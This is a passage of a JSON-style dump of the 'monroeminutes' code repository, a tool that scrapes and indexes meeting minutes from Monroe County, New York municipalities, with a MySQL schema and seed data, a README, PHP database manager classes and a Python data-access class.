null,\ntype varchar(255) not null,\nwebsiteurl text\n);\n\ncreate table suborganizations(\nsuborganizationid int not null auto_increment primary key,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nname text,\nparsename text,\nwebsiteurl text,\ndocumentsurl text,\nscriptname text,\ndbpopulated bool not null\n);\n\ncreate table scrapeurls(\nscrapeurlid int not null auto_increment primary key,\nurl text not null,\nname varchar(255) not null,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nenabled bool not null\n);\n\ncreate table ignoreurls(\nignoreurlid int not null auto_increment primary key,\nurl text not null,\nignoredt datetime not null,\nscrapeurlid int not null,\nforeign key (scrapeurlid) references scrapeurls(scrapeurlid)\n);\n\ncreate table documents(\ndocumentid int not null auto_increment primary key,\nsuborganizationid int not null,\nforeign key (suborganizationid) references suborganizations(suborganizationid),\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nsourceurl text not null,\ndocumentdate date not null,\nscrapedate date not null,\nname text not null,\ndochash text not null,\norphaned bool not null\n);\n\ncreate table documenttexts(\ndocumenttextid int not null auto_increment primary key,\ndocumentid int not null,\nforeign key (documentid) references documents(documentid),\ndocumenttext text not null\n);\n\ncreate table words(\nwordid int not null auto_increment primary key,\ndocumentid int not null,\nforeign key (documentid) references documents(documentid),\nsuborganizationid int not null,\nforeign key (suborganizationid) references suborganizations(suborganizationid),\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nword varchar(127) not null,\nfrequency int not null\n);\n\ncreate table searches(\nsearchid int not null auto_increment primary key,\nsearchterm varchar(255) not null,\nsearchdt datetime not null,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid)\n);\n\ncreate table runs(\nrunid int not null auto_increment primary key,\nrundt datetime not null,\nscrapername text not null,\nsuccessful bool not null,\norganizationid int not null,\nforeign key (organizationid) references organizations(organizationid),\nsuborganizationid int not null,\nforeign key (suborganizationid) references 
suborganizations(suborganizationid)\n);\n\nINSERT INTO organizations VALUES\n(1,'Brighton','town',''),\n(2,'Brockport','village',''),\n(3,'Chili','town',''),\n(4,'Churchville','village',''),\n(5,'Clarkson','town',''),\n(6,'East Rochester','village/town',''),\n(7,'Fairport','village',''),\n(8,'Gates','town',''),\n(9,'Greece','town',''),\n(10,'Hamlin','town',''),\n(11,'Henrietta','town',''),\n(12,'Hilton','village',''),\n(13,'Honeoye Falls','village',''),\n(14,'Irondequoit','town',''),\n(15,'Mendon','town',''),\n(16,'Ogden','town',''),\n(17,'Parma','town',''),\n(18,'Penfield','town',''),\n(19,'Perinton','town',''),\n(20,'Pittsford','town',''),\n(22,'Riga','town',''),\n(23,'Rochester','city',''),\n(24,'Rush','town',''),\n(25,'Scottsville','village',''),\n(26,'Spencerport','village',''),\n(27,'Sweden','town',''),\n(28,'Webster','town',''),\n(29,'Webster','village',''),\n(30,'Wheatland','town',''),\n(31,'Monroe County','County','');\n\nINSERT INTO suborganizations VALUES \n(1,1,'Town of Brighton','','http://www.townofbrighton.org/','http://www.townofbrighton.org/index.aspx?nid=78','simpledifscript',0),\n(2,2,'Village of Brockport','','http://www.brockportny.org/','http://www.brockportny.org/html/government/minutes.html','simpledifscript',0),\n(3,3,'Town of Chili','','http://www.townofchili.org/','http://www.townofchili.org/index.php?option=com_docman&task=cat_view&gid=322&Itemid=52','simpledifscript',0),\n(4,5,'Town of Clarkson','','http://www.clarksonny.org/','http://www.clarksonny.org/html/minutes.html','simpledifscript',0),\n(5,4,'Town of Churchville','','http://www.churchville.net/','','simpledifscript',0),\n(6,6,'Town of East Rochester','','http://eastrochester.org/','http://eastrochester.org/government/board/content/documents/','simpledifscript',0),\n(7,7,'Village of Fairport','','http://www.village.fairport.ny.us/','http://ecode360.com//documents/list/FA0327/quick?CFID=7998379&CFTOKEN=27833541#sub62893','simpledifscript',0),\n(8,8,'Town of Gates','','http://www.townofgates.org/','http://www.townofgates.org/index.php?option=com_content&view=article&id=66&Itemid=87','simpledifscript',0),\n(9,9,'Town of Greece','','http://greeceny.gov/','http://greeceny.gov/board-meetings-past','simpledifscript',0),\n(10,10,'Town of Hamlin','','http://www.hamlinny.org/','http://www.hamlinny.org/Town_Board/index.html#minutes','simpledifscript',0),\n(11,12,'Village of Hilton','','http://www.hiltonny.org/','http://www.hiltonny.org/html/trustees.html','simpledifscript',0),\n(12,13,'Village of Honeoye Falls','','http://www.villageofhoneoyefalls.org/','http://www.villageofhoneoyefalls.org/archive_minutes.php','simpledifscript',0),\n(13,16,'Town of Ogden','','http://www.ogdenny.com','http://www.ecode360.com/documents/list/OG0089/quick/-5','simpledifscript',0),\n(14,17,'Town of Parma','','http://www.parmany.org/','http://www.parmany.org/Town-Boards/','simpledifscript',0),\n(15,18,'Town of Penfield','','http://www.penfield.org/','http://www.penfield.org/index.php?pr=Town_Board_Agendas','simpledifscript',0),\n(16,19,'Town of Perinton','','http://www.perinton.org/','http://www.perinton.org/Boards/TwnBrd/twnbdAgd/','simpledifscript',0),\n(17,20,'Town of Pittsford','','http://townofpittsford.org/','http://townofpittsford.org/home-tbminutes','simpledifscript',0);\n\n\n"
},
{
"alpha_fraction": 0.650580883026123,
"alphanum_fraction": 0.6621983647346497,
"avg_line_length": 28.3157901763916,
"blob_id": "d587d01e69615761cc0eed5ad49f182d256a2035",
"content_id": "a6ab86c3d26d1508b1cc2c05d324decdf9487ecd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 373,
"num_lines": 38,
"path": "/README.md",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "monroeminutes.org\n=================\n\nTools and Technologies\n----------------------\n\nThe site is built on Python scrapers, and PHP web back-end interfacing to a MySQL database.\n\nThe base classes for both the python and the PHP were generated from SQL via sql2api ( http://github.com/thequbit/sql2api ).\n\n\nOverview\n--------\n\nMonroeMinutes, and thus monroeminutes.org, is a document agrigator and indexer. The tools scrape websites within Monroe County and pull meeting minutes and other important documents from various village, town, city, and county websites. These are then indexed using a histogram method with keyword rejection (black list of words that are too common to include in search).\n\nThe data is setup in the following way:\n\n\t|-> Organization 0\n\t\t|-> Sub Organization 0\n\t\t\t|-> Document 0\n\t\t\t\t|-> <token data>\n\t\t\t|-> Document 1\n\t\t\t\t|-> <token data>\n\t\t\t|-> Document 2\n\t\t\t\t\t|-> <token data>\n\t\n\t\t|-> Sub Organization 1\n\t\t\t|-> Document 0\n\t\t\t\t|-> <token data>\n\t\n\t|-> Organization 1\n\t\t|-> Sub Organization 0\n\t\t\t|-> Document 0\n\t\t\t\t|-> <token data>\n\t\t\t\t|-> <token data>\n\t\t\t|-> Document 1\n\t\t\t\t|-> <token data>\n\t\t\t\t\n"
},
{
"alpha_fraction": 0.6063268780708313,
"alphanum_fraction": 0.606829047203064,
"avg_line_length": 31.120967864990234,
"blob_id": "f41ff31fda6fccbb911ac122116cd0b2cdc59b88",
"content_id": "cab6b6813d12773b33db73dd321f17f204182bb9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3983,
"license_type": "no_license",
"max_line_length": 348,
"num_lines": 124,
"path": "/web/tools/DocumentsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass DocumentsManager\n\t{\n\t\tfunction add($suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO documents(suborganizationid,organizationid,sourceurl,documentdate,scrapedate,name,dochash,orphaned) VALUES(?,?,?,?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssssss\", $suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'sourceurl' => $row['sourceurl'],'documentdate' => $row['documentdate'],'scrapedate' => $row['scrapedate'],'name' => $row['name'],'dochash' => $row['dochash'],'orphaned' => $row['orphaned']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($documentid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documents WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documentid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'sourceurl' => $row['sourceurl'],'documentdate' => $row['documentdate'],'scrapedate' => $row['scrapedate'],'name' => $row['name'],'dochash' => $row['dochash'],'orphaned' => $row['orphaned']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM documents';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'sourceurl' => $row['sourceurl'],'documentdate' => $row['documentdate'],'scrapedate' => $row['scrapedate'],'name' => $row['name'],'dochash' => $row['dochash'],'orphaned' => $row['orphaned']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . 
$e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($documentid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM documents WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $documentid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($documentid,$suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE documents SET suborganizationid = ?,organizationid = ?,sourceurl = ?,documentdate = ?,scrapedate = ?,name = ?,dochash = ?,orphaned = ? WHERE documentid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssssssss\", $suborganizationid,$organizationid,$sourceurl,$documentdate,$scrapedate,$name,$dochash,$orphaned, $documentid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.6052287817001343,
"alphanum_fraction": 0.6058823466300964,
"avg_line_length": 38.74026107788086,
"blob_id": "5d297fa38edbc7aebfee428c9718724909c8fa9f",
"content_id": "567bb32922ee41cad483a0cc8c13035fa92643f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3060,
"license_type": "no_license",
"max_line_length": 428,
"num_lines": 77,
"path": "/scripts/suborganizations.py",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "import MySQLdb as mdb\nimport _mysql as mysql\nimport re\n\nclass suborganizations:\n\n __settings = {}\n __con = False\n\n def __init__(self):\n configfile = \"sqlcreds.txt\"\n f = open(configfile)\n for line in f:\n # skip comment lines\n m = re.search('^\\s*#', line)\n if m:\n continue\n\n # parse key=value lines\n m = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n if m is None:\n continue\n\n self.__settings[m.group(1)] = m.group(2)\n f.close()\n\n # create connection\n self.__con = mdb.connect(host=self.__settings['host'], user=self.__settings['username'], passwd=self.__settings['password'], db=self.__settings['database'])\n\n def __sanitize(self,valuein):\n if type(valuein) == 'str':\n valueout = mysql.escape_string(valuein)\n else:\n valueout = valuein\n return valuein\n\n def add(self,organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"INSERT INTO suborganizations(organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated) VALUES(%s,%s,%s,%s,%s,%s,%s)\",(self.__sanitize(organizationid),self.__sanitize(name),self.__sanitize(parsename),self.__sanitize(websiteurl),self.__sanitize(documentsurl),self.__sanitize(scriptname),self.__sanitize(dbpopulated)))\n cur.close()\n newid = cur.lastrowid\n return newid\n\n def get(self,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM suborganizations WHERE suborganizationid = %s\",(suborganizationid))\n row = cur.fetchone()\n cur.close()\n\n def getall(self):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"SELECT * FROM suborganizations\")\n rows = cur.fetchall()\n cur.close()\n\n _suborganizations = []\n for row in rows:\n _suborganizations.append(row)\n\n return _suborganizations\n\n def delete(self,suborganizationid):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"DELETE FROM suborganizations WHERE suborganizationid = %s\",(suborganizationid))\n cur.close()\n\n def update(self,suborganizationid,organizationid,name,parsename,websiteurl,documentsurl,scriptname,dbpopulated):\n with self.__con:\n cur = self.__con.cursor()\n cur.execute(\"UPDATE suborganizations SET organizationid = %s,name = %s,parsename = %s,websiteurl = %s,documentsurl = %s,scriptname = %s,dbpopulated = %s WHERE suborganizationid = %s\",(self.__sanitize(organizationid),self.__sanitize(name),self.__sanitize(parsename),self.__sanitize(websiteurl),self.__sanitize(documentsurl),self.__sanitize(scriptname),self.__sanitize(dbpopulated),self.__sanitize(suborganizationid)))\n cur.close()\n\n##### Application Specific Functions #####\n"
},
{
"alpha_fraction": 0.5303197503089905,
"alphanum_fraction": 0.5303197503089905,
"avg_line_length": 18.7391300201416,
"blob_id": "4d30f2e4f7a077abd0ba41b974df724d49618cfd",
"content_id": "c09fe15c1b85baaec7fe078ca862ca108e26a592",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 907,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 46,
"path": "/web/tools/old/OrganizationManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass OrganizationManager\n\t{\n\t\tfunction GetAllOrganizations()\n\t\t{\n\t\t\tdprint( \"GetAllOrganizations() Start.\" );\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool();\n\t\t\t\n\t\t\t\t$query = 'SELECT * from organizations';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t//$stmt->bind_param(\"s\", $albumid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$organizations = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$organization = (object) array( 'id' => $row['organizationid'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'name' => $row['name'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t'type' => $row['type']\n\t\t\t\t\t\t\t\t\t\t\t\t );\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t$organizations[] = $organization;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\t\n\t\t\tdprint(\"GetAllOrganizations() Done.\");\n\t\t\t\n\t\t\treturn $organizations;\n\t\t}\n\t\n\t}\n\t\n?>"
},
{
"alpha_fraction": 0.5705843567848206,
"alphanum_fraction": 0.5712409615516663,
"avg_line_length": 23.564516067504883,
"blob_id": "a83ff7a4d8ab31571d54a0b3d69afa3c6538cbea",
"content_id": "df81732e4a0b8cbe2356dbbbc7728368c2266799",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3046,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 124,
"path": "/web/tools/SearchesManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass SearchesManager\n\t{\n\t\tfunction add($searchterm,$searchdt,$organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO searches(searchterm,searchdt,organizationid) VALUES(?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\", $searchterm,$searchdt,$organizationid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('searchid' => $row['searchid'],'searchterm' => $row['searchterm'],'searchdt' => $row['searchdt'],'organizationid' => $row['organizationid']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($searchid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM searches WHERE searchid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $searchid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('searchid' => $row['searchid'],'searchterm' => $row['searchterm'],'searchdt' => $row['searchdt'],'organizationid' => $row['organizationid']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM searches';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('searchid' => $row['searchid'],'searchterm' => $row['searchterm'],'searchdt' => $row['searchdt'],'organizationid' => $row['organizationid']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($searchid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM searches WHERE searchid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $searchid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($searchterm,$searchdt,$organizationid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE searches SET searchterm = ?,searchdt = ?,organizationid = ? WHERE searchid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssss\", $searchterm,$searchdt,$organizationid, $searchid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5802794098854065,
"alphanum_fraction": 0.5827090740203857,
"avg_line_length": 26.28729248046875,
"blob_id": "71637e2a4e9dbcc5c916918044c3a9a8c1ae1a34",
"content_id": "173ad7537058e7a28dac12b7e59502415da68bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4939,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 181,
"path": "/web/tools/WordsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass WordsManager\n\t{\n\t\tfunction add($documentid,$suborganizationid,$organizationid,$word,$frequency)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO words(documentid,suborganizationid,organizationid,word,frequency) VALUES(?,?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssss\", $documentid,$suborganizationid,$organizationid,$word,$frequency);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('wordid' => $row['wordid'],'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'word' => $row['word'],'frequency' => $row['frequency']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($wordid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM words WHERE wordid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $wordid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('wordid' => $row['wordid'],'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'word' => $row['word'],'frequency' => $row['frequency']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM words';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('wordid' => $row['wordid'],'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'organizationid' => $row['organizationid'],'word' => $row['word'],'frequency' => $row['frequency']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($wordid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM words WHERE wordid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $wordid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($documentid,$suborganizationid,$organizationid,$word,$frequency)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE words SET documentid = ?,suborganizationid = ?,organizationid = ?,word = ?,frequency = ? 
WHERE wordid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssssss\", $documentid,$suborganizationid,$organizationid,$word,$frequency, $wordid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t\tfunction search($organizationid,$keyword,$page)\n\t\t{\n\t\t try\n\t\t\t{\n\t\t\t\t// decode offset based on page assuming 10 items / page\n\t\t\t\tif( $page > 1 )\n\t\t\t\t\t$limit = intval( ($page-1) * 10 );\n\t\t\t\telse\n\t\t\t\t\t$limit = 0;\n\t\t\t\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT word,documentid,suborganizationid,frequency FROM words WHERE organizationid = ? AND word = ? ORDER BY frequency DESC LIMIT 10 OFFSET ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sss\",$organizationid, $keyword, $limit);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('word' => $row['word'], 'documentid' => $row['documentid'],'suborganizationid' => $row['suborganizationid'],'frequency' => $row['frequency']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\t\t\n\t\tfunction getcount($organizationid,$keyword)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT count(wordid) as count FROM words WHERE organizationid = ? and word = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ss\",$organizationid, $keyword);\n\t\t\t\t$results = $db->Execute($stmt);\n\n\t\t\t\t$count = $results[0]['count'];\n\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\n\t\t\treturn 